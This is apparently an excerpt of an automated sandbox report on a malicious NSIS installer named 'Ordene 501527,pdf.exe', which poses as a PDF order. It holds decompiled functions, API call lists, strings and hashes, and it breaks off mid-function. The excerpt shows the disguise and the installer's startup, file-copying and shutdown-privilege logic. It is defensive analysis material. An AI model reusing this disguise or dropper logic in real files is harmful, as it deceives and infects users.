0x0040347d
0x00000000
0x00403550
0x00403557
0x0040355d
0x00403560
0x00403560
0x00403561
0x00403564
0x00000000
0x0040356d
0x004033a5
0x004033a6
0x004033b2
0x004033b9
0x00000000
0x004033bb
0x004033bd
0x004033cb
0x004033d0
0x004033d7
0x004033db
0x004033df
0x004033e1
0x004033e1
0x004033df
0x00000000
0x004033d7

APIs

SetErrorMode.KERNELBASE ref: 00403373
GetVersion.KERNEL32 ref: 00403379
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
OleInitialize.OLE32(00000000), ref: 004033F0
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403434
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,00000020,?,00000006,00000008,0000000A), ref: 0040345B

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035CE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
ExitProcess.KERNEL32 ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036FA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403709
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403714
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
CopyFileW.KERNEL32(C:\Users\user\Desktop\Ordene 501527,pdf.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037AA
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
AdjustTokenPrivileges.ADVAPI32 ref: 00403845
ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
ExitProcess.KERNEL32 ref: 0040388D

Strings

C:\Users\user\Desktop, xrefs: 00403719, 0040371E, 0040374B
1033, xrefs: 004035F6
TMP, xrefs: 004035E2
~nsu, xrefs: 004036F2
"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 00403427, 0040342D, 00403623
Low, xrefs: 004035C8
SeShutdownPrivilege, xrefs: 0040381C
UXTHEME, xrefs: 004033A0, 004033A5, 004033AB
C:\Users\user\Desktop\Ordene 501527,pdf.exe, xrefs: 004037A5
NSIS Error, xrefs: 00403412
TEMP, xrefs: 004035DA
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4, xrefs: 00403578, 00403698, 00403742, 0040374C
.tmp, xrefs: 0040370E
Error launching installer, xrefs: 0040367D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209, xrefs: 004036A3
C:\Users\user\AppData\Local\Temp\, xrefs: 0040358A, 0040358F, 004035A5, 004035B1, 004035C0, 004035CD, 004035D9, 004035E1, 004036F7, 00403708, 00403713, 0040371F, 0040372C, 0040373B, 004037EC
\Temp, xrefs: 004035AC

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209$C:\Users\user\Desktop$C:\Users\user\Desktop\Ordene 501527,pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2653860084
Opcode ID: 01b7472b3b73da940d45764b52e5ba9f58f733b95c876c2cd5037b4390ea3532
Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
Opcode Fuzzy Hash: 01b7472b3b73da940d45764b52e5ba9f58f733b95c876c2cd5037b4390ea3532
Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065A2(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f70); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f70;
			}

0x004065ad
0x004065b6
0x00000000
0x004065c3
0x004065b9
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,00405C81,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,?,75173420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75173420), ref: 004065AD
FindClose.KERNEL32(00000000), ref: 004065B9

Strings

pOz, xrefs: 004065A3
C:\Users\user\AppData\Local\Temp\nsd84B6.tmp, xrefs: 004065A2

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp$pOz
API String ID: 2295610775-940788043
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D1B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v12;
				struct HWND__* _v32;
				struct tagPOINT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x7a1f08 = _t37;
					if(_t118 == 0x110) {
						 *0x7a8a28 = _t128;
						 *0x7a1f1c = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79fee8 = _t94;
						E004041F4(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x7a7a08);
						 *0x7a79ec = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x7a1f08 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x7a8a60;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404240(0x40b);
						while(1) {
							_t39 =  *0x7a1f08;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x7a8a64;
							if(_t41 ==  *0x7a8a64) {
								E0040140B(1);
							}
							__eflags =  *0x7a79ec - _t136;
							if( *0x7a79ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a64; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406281(_t119, _t128, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041F4(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x7a8acc - _t136;
							_v32 = _t51;
							if( *0x7a8acc != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow(_v12, _t119 & 0x00000100); // executed
							E00404216(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x79fee8, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW(_v12, 0xf4, _t136, 1);
							__eflags =  *0x7a8acc - _t136;
							if( *0x7a8acc == _t136) {
								_push( *0x7a1f1c);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x79fee8);
							}
							E00404229();
							E0040625F(0x7a1f20, E00403CFC());
							E00406281(0x7a1f20, _t128, _t133,  &(0x7a1f20[lstrlenW(0x7a1f20)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x7a1f20); // executed
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a79f8); // executed
									 *0x7a0ef8 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x7a8a20,  *_t133 +  *0x7a7a00 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x7a79f8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041F4(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa),  &_v56);
									ScreenToClient(_t128,  &_v56);
									SetWindowPos( *0x7a79f8, _t136, _v56, _v56.y, _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x7a79ec - _t136;
									if( *0x7a79ec != _t136) {
										goto L61;
									}
									ShowWindow( *0x7a79f8, 8); // executed
									E00404240(0x405);
									goto L58;
								}
								__eflags =  *0x7a8acc - _t136;
								if( *0x7a8acc != _t136) {
									goto L61;
								}
								__eflags =  *0x7a8ac0 - _t136;
								if( *0x7a8ac0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a79f8);
						 *0x7a8a28 = _t136;
						EndDialog(_t128,  *0x7a06f0);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x7a79f8, 0x40f, 0, 1);
						__eflags =  *0x7a79ec;
						return 0 |  *0x7a79ec == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x7a1f00, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f00,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040425B(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x7a79f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a8acc - _t136;
										if( *0x7a8acc == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x7a06f0 = 1;
											L21:
											_push(0x78);
											L22:
											E004041CD();
											goto L26;
										}
										E0040140B(_t130);
										 *0x7a06f0 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x7a79f8);
						 *0x7a79f8 = _a12;
						L58:
						if( *0x7a3f20 == _t136 &&  *0x7a79f8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x7a3f20 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d24
0x00403d2d
0x00403e6e
0x00403e72
0x00403e76
0x00403e78
0x00403e7d
0x00403e88
0x00403e93
0x00403e98
0x00403e9a
0x00403e9c
0x00403e9f
0x00403ea4
0x00403eb2
0x00403ebf
0x00403ec6
0x00403ec6
0x00403ec7
0x00403ec7
0x00403ecc
0x00403ed2
0x00403ed9
0x00403edf
0x00403ee1
0x00403f21
0x00403f26
0x00403f2b
0x00403f2b
0x00403f30
0x00403f39
0x00403f3b
0x00403f40
0x00403f46
0x00403f4a
0x00403f4a
0x00403f4f
0x00403f55
0x00000000
0x00000000
0x00403f60
0x00403f66
0x00000000
0x00000000
0x00403f6f
0x00403f77
0x00403f7c
0x00403f7f
0x00403f85
0x00403f8a
0x00403f8d
0x00403f93
0x00403f98
0x00403f9b
0x00403fa1
0x00403fa9
0x00403faf
0x00403fb5
0x00403fb9
0x00403fc0
0x00403fc0
0x00403fc0
0x00403fca
0x00403fdc
0x00403fe8
0x00403fed
0x00403ff7
0x00403ffd
0x00403fff
0x00404004
0x00404001
0x00404001
0x00404001
0x00404014
0x0040402c
0x0040402e
0x00404034
0x00404049
0x00404036
0x0040403f
0x00404041
0x00404041
0x0040404f
0x00404060
0x00404076
0x0040407d
0x00404087
0x0040408c
0x0040408e
0x00000000
0x00404094
0x00404094
0x00404096
0x00000000
0x00000000
0x0040409c
0x004040a0
0x004040c5
0x004040cb
0x004040d1
0x004040d3
0x00000000
0x00000000
0x004040f9
0x004040ff
0x00404101
0x00404106
0x00000000
0x00000000
0x0040410c
0x0040410f
0x00404112
0x00404129
0x00404135
0x0040414e
0x00404158
0x0040415d
0x00404163
0x00000000
0x00000000
0x0040416d
0x00404178
0x00000000
0x00404178
0x004040a2
0x004040a8
0x00000000
0x00000000
0x004040ae
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040ba
0x0040408e
0x00404185
0x00404191
0x00404198
0x00000000
0x00403ee3
0x00403ee3
0x00403ee6
0x00403f19
0x00403f19
0x00403f1b
0x00000000
0x00000000
0x00000000
0x00403f1b
0x00403eec
0x00403ef1
0x00403ef3
0x00000000
0x00000000
0x00403f03
0x00403f0b
0x00000000
0x00403f11
0x00403d3f
0x00403d3f
0x00403d43
0x00403d48
0x00403d57
0x00403d57
0x00403d60
0x00403d69
0x00403d74
0x00403d74
0x00403d80
0x00403d9c
0x00403d9f
0x00403db2
0x00403db8
0x00403e5b
0x00000000
0x00403e64
0x00403dbe
0x00403dcb
0x00403dcd
0x00403dcf
0x00403dee
0x00403dee
0x00403df1
0x00403df6
0x00403df9
0x00403e09
0x00403e0a
0x00403e0c
0x00403e42
0x00403e55
0x00000000
0x00403e55
0x00403e0e
0x00403e14
0x00403e2d
0x00403e32
0x00403e34
0x00000000
0x00000000
0x00403e36
0x00403e22
0x00403e22
0x00403e24
0x00403e24
0x00000000
0x00403e24
0x00403e17
0x00403e1c
0x00000000
0x00403e1c
0x00403dfb
0x00403e01
0x00000000
0x00000000
0x00403e03
0x00000000
0x00403e03
0x00403df3
0x00000000
0x00403df3
0x00403dd9
0x00403de0
0x00403de6
0x00403de8
0x00000000
0x00000000
0x00000000
0x00403de8
0x00403da4
0x00000000
0x00403d82
0x00403d88
0x00403d92
0x0040419e
0x004041a4
0x004041b1
0x004041b7
0x004041b7
0x004041c1
0x00000000
0x004041c1
0x00403d80

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
ShowWindow.USER32(?), ref: 00403D74
DestroyWindow.USER32 ref: 00403D88
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
GetDlgItem.USER32(?,?), ref: 00403DC5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
IsWindowEnabled.USER32(00000000), ref: 00403DE0
GetDlgItem.USER32(?,00000001), ref: 00403E8E
GetDlgItem.USER32(?,00000002), ref: 00403E98
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
GetDlgItem.USER32(?,00000003), ref: 00403FA9
ShowWindow.USER32(00000000,?), ref: 00403FCA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
EnableWindow.USER32(?,?), ref: 00403FF7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
EnableMenuItem.USER32(00000000), ref: 00404014
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040402C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
ShowWindow.USER32(?,0000000A), ref: 004041B1

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040396D(signed int __ecx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t78 = __ecx;
				_t82 =  *0x7a8a34;
				_t22 = E00406639(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f20;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040612D(__ecx, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f20, 0);
					__eflags =  *0x7a1f20;
					if(__eflags == 0) {
						E0040612D(__ecx, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x7a1f20, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004061A6(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C43(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4";
				 *0x7a8ac0 =  *0x7a8a3c & 0x00000020;
				 *0x7a8adc = 0x10000;
				if(E00405C38(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4") != 0) {
					L16:
					if(E00405C38(_t98, _t86) == 0) {
						E00406281(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x7a8a20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a08 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C43(_t78, __eflags);
							__eflags =  *0x7a8ae0;
							if( *0x7a8ae0 != 0) {
								_t33 = E00405396(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a79ec;
								if( *0x7a79ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f00, 5); // executed
							_t39 = E004065C9("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065C9("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a79c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a79c0);
								 *0x7a79e4 = _t87;
								RegisterClassW(0x7a79c0);
							}
							_t44 = DialogBoxParamW( *0x7a8a20,  *0x7a7a00 + 0x00000069 & 0x0000ffff, 0, E00403D1B, 0); // executed
							E004038BD(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a20;
						 *0x7a79c4 = 0x401000;
						 *0x7a79d0 =  *0x7a8a20;
						 *0x7a79d4 = _t30;
						 *0x7a79e4 = 0x40a380;
						if(RegisterClassW(0x7a79c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f00 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a20, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a69c0;
